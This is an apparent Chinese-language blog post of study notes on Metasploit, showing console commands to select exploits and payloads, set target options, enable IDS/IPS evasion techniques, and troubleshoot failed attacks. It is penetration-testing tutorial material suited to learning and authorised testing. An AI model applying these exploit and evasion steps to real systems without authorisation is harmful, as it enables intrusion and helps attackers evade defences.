2010年9月8日 星期三

Metasploit 續1

選擇攻擊程式

msf> show exploits          #控制台介面 顯示清單
msf> use osx/ftp/webstar_ftp_user                     #選擇攻擊程式
$ ./msfcli | grep osx/     #命令列介面 列出所有Mac OS X的攻擊清單

選擇Payload

msf> show payloads          #控制台介面 顯示所有payload清單
   #如果先選擇攻擊程式,則show payloads只會顯示攻擊程式所支援的payload
msf> use osx/browser/sadari_metadate_archive          #選擇攻擊程式
msf> show payloads
msf> set PAYLOAD windows/upexec/bind_tcp     #設定搭配的payload
    #可使用 info payloadname取得payload的詳細資訊
msf> info windows/shell/find_tag   
   

設定option

msf exploit(ms03_026_dcom)>  show options   
   #控制台介面 顯示所有option清單
   #選擇攻擊程式後 使用 set optionname value命令,設定option
   #Required為yes之option為必填
msf exploit(ms03_026_dcom)> set RHOST 192.168.0.18     
     #設定RHOST選項
    #可使用unset optionname命令,將option的值完全去除掉

隱藏option

target

msf exploit(mozilla_mavigatorjava)>show payloads
msf exploit(mozilla_mavigatorjava)>show targets
msf exploit(mozilla_mavigatorjava)>set TARGET 1    #設置targetID
TARGET => 1           #系統自行顯示
msf exploit(mozilla_mavigatorjava)>show payloads   #顯示更多的payload

     #隨著攻擊執行,它通常會將有用的資訊顯示在控制台上 

evasion

  • 允許用戶以更容易與更一致的方法越過安全防護裝置
  • 規避選項清單通常由協定開始,以協助區分規避正在哪一個網路分層上進行
  • 可利用HTTP::chunked規避技術,影響網路交通流量,降低被偵測到的機會
  • 透過結合多種規避技術(例如,JavaScript obfuscation、Unicode encoding和GZIP compression),將被偵測到的機率降到最低
msf exploit(aim_goaway)> show evasion   #顯示支援的規避技術清單
msf exploit(aim_goaway)>set HTTP::compression gzip    #示範為攻擊啟用HTTP GZIP壓縮

advanced

msf exploit(ms05_017_msmq)>show advanced         
                     #控制台介面 顯示隱藏optiontype,info指令也可以達相同像果
Module advanced options:                          #系統自行顯示

Name           :DynamicSehRcord                #系統自行顯示
Current Setting:no                             #系統自行顯示
Description     :Generate a dynamic SEH record (more stealthy)  #系統自行顯示
msf exploit(ms05_017_msmq)>set DynamicSehRcord yes
DynamicSehRcord => yes                     #系統自行顯示
不使用evasion與advanced選項或許沒差,但有些攻擊程式將target被設定成[自動]的目標,這表示當它在執行攻擊時,攻擊程式會決定哪個軟體版本在執行,並且運用正常的預設值,而不要任何與用戶互動,某些攻擊程式支援多個目標,用戶必須選擇正確的一個,譬如mozilla_mavigatorjava攻擊程式支援3個作業系統的4個作業目標,如果不指定目標,可用的payload的清單將會被大大減少,因為只有[通用](generic)的payload可以應用在跨多個作業系統與CPU架構

執行攻擊

msf exploit(ms03_026_dcom)>  exploit
     #隨著攻擊執行,它通常會將有用的資訊顯示在控制台上 

攻擊偵錯

由於修補程式、組態等因素,目標電腦不怕該攻擊程式

  • 重新組態有安全漏洞的軟
  • 移除已經應用的修補程式

目標電腦未執行你試圖攻擊的軟體

  • 安裝具有此安全漏洞的軟體

防火牆正封鎖你要連結的port

  • 挑選其他port

主機或網路IPS正在偵測並阻止攻擊程式

  • 運用Metasploit的規避(evasion)選項,試著騙過IPS

所選取的payload變型因某種原因而失敗

  • 嘗試其他的payload與payload變形

攻擊程式的必要選項之一具有不適當的值

  • 根據實際狀況的理解把各項選項設定成其他合理值
  • 使用嗅探器徹底偵查

目標電腦在技術上具有安全漏洞,但目前正處於能夠阻擋攻擊的狀態

  • [可靠]的安全漏洞隨著一次又一次的攻擊讓行程呈現越來越嚴重的受損狀態
  • 重新啟動目標電腦,以返回具有安全漏洞的狀態

目標電腦位於NAT設備後面

  • 確認正在使用的reverse或者find_tag的payload變數

資料出處:O'REILLY 防駭超級工具

沒有留言:

張貼留言